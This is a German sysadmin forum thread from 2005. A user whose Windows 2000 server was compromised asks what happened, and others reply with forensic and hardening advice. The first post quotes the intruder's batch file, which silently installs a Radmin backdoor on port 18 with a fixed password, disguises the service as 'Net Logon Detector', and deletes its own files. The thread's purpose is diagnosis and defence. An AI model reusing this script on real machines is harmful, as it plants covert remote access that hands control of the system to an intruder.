Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

Angriff auf W2k Server - RAdmin

Mitglied: 3080

3080 (Level 1)

17.01.2005, aktualisiert 09.01.2009, 5979 Aufrufe, 5 Kommentare

Als ich unseren Win2000 Server wegen der neusten Windows-Updates rebootet habe war auf einmal folgendes Symbol/Programm aktiv bzw. in der Taskleiste zu sehen:

<img src='/images/articles/1632a072e2b31656b01d16faa7dbf233-radmin.jpg' align='default' hspace='0' vspace='0' border='0'>

Nach hin- und hersuchen und Informationen einholen hab ich dann schliesslich einige Dateien in Winnt\Installer\{irgendeinHashwert} gefunden, unter anderem auch folgende Batch-Datei:

@echo off
rmico
svchost /install /silence
svchost /save /port:18 /pass:An30Gm34 /silence
net start R_server
svcinst -c R_server "Net Logon Detector"
del rmico.reg /a/f/q
del rmico.exe /a/f/q
del temp2.bat /a /f /q

Hier hat wohl jemand ein Fernadministrations-Tool installiert, aber könnt Ihr mir sagen was hier genau abläuft? Habe die dazugehörigen Dateien gelöscht, Einträge in der Registry unter dem Namen "RAdmin" entfernt, den Remote-Registry-Dienst gestoppt und den Server neu gestartet. Jetzt ist das Symbol zwar weg, aber mich würde trotzdem mal interessieren wie es dahinkommt und welchen Risiken der Server ausgesetzt ist damit sowas überhaupt möglich ist. Gibt es eine zuverlässige Firewall für W2k Server um sich vor soetwas zu schützen?
Mitglied: 7217
17.01.2005 um 14:51 Uhr
Herzlichen Glückwunsch:

du hast mit deiner voreiligen Aktion sämtliche Beweise vernichtet! Was du cleverer hättest machen sollen wäre eine komplette Sicherung des Systems gewesen (vorher alle Netzwerkaktivitäten sichern, damit man weiss, in welchem Status das Gerät aktuell war und ob evtl. noch Verbindungen zum Feind bestanden haben).

Anschließend hätte ich den Server vom Netz genommen und "Forensik" betrieben, was genau bedeutet, dass man mal versucht herauszufinden, welche Löcher man sich denn in die Sicherheit seines Servers geschossen hat.

Firewalls (auf dem Server) dürften dich vor sowas nur sehr marginal schützen. Sicherer ist es, den Patchstatus des Servers aktuell zu halten und auf jeden unnötigen Schnickschnack zu verzichten.

Gruß, Mupfel
Bitte warten ..
Mitglied: fresch-heit
18.01.2005 um 19:27 Uhr
/ironie/
hast du echt ne direkte verbindungs ins inet... ohne firewall /virenscanner sowas gibts noch ;)) und ich wunder mich warum sich viren immer noch so verbreiten... tsss
/ironie/
Bitte warten ..
Mitglied: 7217
18.01.2005 um 19:36 Uhr
Ich sprach von einer Firewall AUF dem Server... was ich VOR meinen Servern habe, ist ne ganz andere Geschichte.

Gruß, Mupfel
Bitte warten ..
Mitglied: priez
07.03.2005 um 17:20 Uhr
ich hab remoteadministrator zuhause aufm pc drauf. ist ein einfaches remote tool. soll einige lücken haben und knackbar sein.

ich hätte den Server vom Netz genommen (und wenn das nicht geht, zumindest den im server eingestellten "incoming port" gesperrt (standard 4899 oder so)). Danach hätte ich mir mal die logfiles angeschaut... oder wenn du eindeutig beim angriff benutzte dateien hast, alles im system mit dem gleichen erstelldatum (zeitraum) gesucht.

Wenn das Ding schon gelaufen ist ( >3 std), hast du praktisch keine chance mehr. Er hat damit vollzugriff und mit 1-3 scripten hat er vmware oder weiss sonst was dazuinstalliert.

Viel Spass beim neuinstallieren oO
Bitte warten ..
Mitglied: priez
07.03.2005 um 17:22 Uhr
nachtrag:

wenn du davor eine gute FW hast brauchst du auf dem server kaum noch eine. Du solltest lieber den patchstatus aktuell halten (wie schon gesagt wurde) und dir deine 3rd Party Programme, welche netzwerkdienste anbieten, mal genauer anschaun...
Bitte warten ..
Ähnliche Inhalte
CPU, RAM, Mainboards

IAMT KVM-Zugriff (RADMIN-Viewer, VNC-Viewer, . )

gelöst Frage von moar70CPU, RAM, Mainboards7 Kommentare

Hallo! Ich habe auf meiner TAROX-Workstation (Mainboard Fujitsu D3128 B2) iAMT (Version ME 8.1.40.1416) konfiguriert. Der Webzugriff mittels funktioniert, ...

Sicherheit

Angriff auf meinen internen Webserver?

gelöst Frage von tguhl99Sicherheit8 Kommentare

Hallo, ich habe ein Problem mit meinen Netz. Auf einem internen Server läuft mein Intranet mit xampp. Es gibt ...

Erkennung und -Abwehr

Ankündigung eines DDoS Angriffs

gelöst Frage von runasserviceErkennung und -Abwehr23 Kommentare

Hallo, kurze Anfrage in die Runde. Sind solche "Spam-Mails" ernst zu nehmen? Vielen Dank

Sicherheitsgrundlagen

Rest-Sicherheitsrisiko durch Blockierten Angriff beim Surfen? - Phishing oder Virus - Angriff

Frage von LoopingLuiSicherheitsgrundlagen5 Kommentare

Hallo Leute, beim Surfen wurde ich nach einer Google Suche, wo ich die Website des Herstellers LiteOnIt aufrufen wollte, ...

Neue Wissensbeiträge
Video & Streaming

Ruckelfreies Fernsehen auf Smartphone oder Tablet - in SD oder gar HD - Eine Alternative zum Fritz DVB-C Receiver

Anleitung von power-user vor 2 StundenVideo & Streaming1 Kommentar

Wer kennt das nicht: Man möchte gemütlich auf dem Balkon sitzen und vielleicht grillen und dabei das WM-Spiel gucken ...

Erkennung und -Abwehr
Trendmicro WFBS 10 ist in deutsch verfügbar!
Tipp von VGem-e vor 12 StundenErkennung und -Abwehr

Servus Kollegen, downloadbar unter

Windows Update

Microsoft Patchday Juni 2018 - BSOD, obwohl noch kein Patch freigegeben

Erfahrungsbericht von diemilz vor 12 StundenWindows Update4 Kommentare

Hallo zusammen, wir hatten hier letzte Woche ein massives Problem. Alles begann damit, dass ein Mitarbeiter kurz vor Feierabend ...

Microsoft
Shadow Defender
Tipp von Hyrule vor 1 TagMicrosoft

Ich denke viele kennen es: Ein Update oder ein neues Programm und vieles funktioniert nicht mehr wie gewünscht. Die ...

Heiß diskutierte Inhalte
Batch & Shell
Powershell Netzwerkdrucker auflisten
gelöst Frage von schiggi85Batch & Shell16 Kommentare

Hallo zusammen, ich möchte mit dem invoke-command bei einem remoteclient die installierten Netzwerkdrucker des Users abfragen. Nur klappt das ...

Outlook & Mail
Nachweis des Löschens einer Email nach DSGVO in Outlook
Frage von linuxadmOutlook & Mail15 Kommentare

Hallo Forum, wie wahrscheinlich viele von Euch kämpfe ich mit der Umsetzung der DSGVO bei meinen Kunden. Konkret geht ...

CPU, RAM, Mainboards
ASUS P5W DELUXE startet nur manchmal und nur mit 2 GraKas
Frage von Windows10GegnerCPU, RAM, Mainboards15 Kommentare

Hallo, ich habe das o.g. Motherboard erhalten. Egal ob C2D 8400, Pentium D 945 oder P4 670, das teil ...

Exchange Server
Exchange 2013 kein Mail-Versand und -Empfang nach Neustart
Frage von AkroshExchange Server11 Kommentare

Hallo zusammen, ich habe hier ein Problem mit unserem Exchange Server 2013 (VM auf ESXi 6.5). Die Festplatten C ...